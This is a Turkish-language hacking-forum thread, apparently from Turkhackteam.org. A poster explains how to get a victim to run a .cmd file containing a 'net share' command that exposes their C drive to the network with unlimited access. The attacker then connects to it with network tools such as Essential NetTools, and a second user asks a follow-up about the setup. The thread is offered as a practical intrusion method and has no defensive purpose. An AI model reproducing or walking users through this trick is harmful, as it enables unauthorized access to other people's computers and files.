karsi tarafin bilgisayarini paylasima acik hale getirme

  • Konbuyu başlatan Spy' Man
  • Başlangıç tarihi
S

Spy' Man

Ziyaretçi
arkadşlar başkasının bilgisayarınagirmemizi sağlayan programların neredeyse paylaşıma açık olması gereken programlarda oluşuyor bunun için bu bilgilere dikkat:

net share hacker=c:\ /unlimited /remark:"Blackking"


bu komutu notepad a yazın . sonra da dosyayı .cmd biçiminde kaydedin .

karşı taraf açtıktan sonra c sürücüsü paylaşıma açık olacaktır .

sonra karşı tarafın ip ni essential net tools yada Bui Bios gibi programlara yazarak erişimi sağlarsınız .

Not bu komut sadece c sürücüsünü paylaşıma açık hale getirir .

eğer başka sürücüleri varsa c yerine d ,e artık ne kadarsa yazarak ekleyebilirsiniz.

Essential NetTools 4.2 Build 233 indir - Yeni Program

Essential NetTools 4.2 Build 233
 

Mrt Krblt

Uzman üye
7 Şub 2011
1,685
0
local şebeke
bunu yapmak için arada wireles, yada farklı bi şekilde ag olması gerekiyomu, geçenlerde buna çok ugraştım ama ıp sini yazdıgım halde hiç bişe bulamadı da??
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.